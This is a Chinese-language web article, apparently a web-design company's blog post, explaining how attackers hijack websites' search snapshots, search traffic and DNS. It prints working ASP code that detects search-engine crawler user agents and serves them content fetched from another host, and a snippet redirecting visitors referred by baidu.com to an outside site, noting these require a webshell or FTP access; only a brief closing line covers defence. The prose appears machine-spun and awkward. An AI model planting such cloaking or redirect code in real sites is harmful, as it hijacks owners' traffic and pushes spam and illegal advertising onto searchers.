前不久見到有網民問網址模塊劫持,網站快照劫持,百度新聞源劫持是怎么操作的。結論大部分朋友都表明不了解,我今天來跟大伙兒分享一下網址劫持是怎么操作的,如何防范。
1.網站快照劫持
動態頁面主頁根據在PHP或是ASP,ASPX文檔中加上分辨編碼,分辨如果是蜘蛛瀏覽就修改標題具體內容,在文章標題具體內容載入聯系電話和違法廣告宣傳信息,要不是蜘蛛瀏覽也不做改動。
靜態網頁主頁,在下午三點上下刪除你的.html文件,加上inde.php,php中載入相近上邊的句子,如果是蜘蛛就回到修改了文章標題的主頁具體內容,并不是就回到正常的具體內容。
快照更新劫持較為反感,即使你修補了劫持,百度搜索上依然會表明很長一段時間的違法快照更新信息。
編碼如下所示:
<%
function GetBot()
'查看蜘蛛
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT") '重要判斷語句
if instr(1,s_agent,"googlebot",1) >0 then
GetBot="google"
end if
if instr(1,s_agent,"msnbot",1) >0 then
GetBot="MSN"
end if
if instr(1,s_agent,"slurp",1) >0 then
GetBot="Yahoo"
end if
if instr(1,s_agent,"baiduspider",1) >0 then
GetBot="baidu"
end if
if instr(1,s_agent,"sohu-search",1) >0 then
GetBot="Sohu"
end if
if instr(1,s_agent,"lycos",1) >0 then
GetBot="Lycos"
end if
if instr(1,s_agent,"robozilla",1) >0 then
GetBot="Robozilla"
end if
end function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"GB2312")'編號
End function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
Function GetBody(url)
on error resume next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Dim wstr,str,url,start,over,dtime
if GetBot="baidu" then
'給百度搜索蜘蛛訂制的具體內容
url="http://baidu.seowhy.com"
'要想展現給蜘蛛的網頁詳細地址
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
elseif GetBot="google" then
'給google 蜘蛛訂制的具體內容
url="http://baidu.seowhy.com"
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
end if
2.百度搜索引擎總流量劫持
這類劫持比快照更新劫持簡易,同時在主頁加上,分辨瀏覽歸路是百度搜索引擎或是其他的JS源代碼,當歸路是百度搜索引擎的過程中就自動跳轉到目標站。
編碼如下所示:
<%
ifinstr(Request.ServerVariables("http_referer"),"www.baidu.com")>0then
'假如客戶來自www.baidu.com
response.redirect("http://baidu.seowhy.com/")
'自動跳轉特定詳細地址
end if
%>
3.DNS大白菜站劫持
在解析域名里加上泛分析到目的詳細地址,在總體目標詳細地址服務器上很多形成劫持網站域名的分站。
匯總:1和2必須得到網址的WEBSHELL或是FTP,假如贏得了百度新聞源網址的這類管理權限,就能做百度新聞源劫持;3必須得到DNS管理方法賬號。因此導致網址被劫持的主要因素或是自身網址被侵入,或是被掃FTP的挖機掃出來了FTP賬號等,網絡信息安全沒搞好的緣故。因此只需網絡信息安全及時,別人是劫持不你的企業網站的。歡迎大家持續關注專業網站建設企業的網址,希望大家可以經商企云的網址初中到物品,提升自身的專業知識。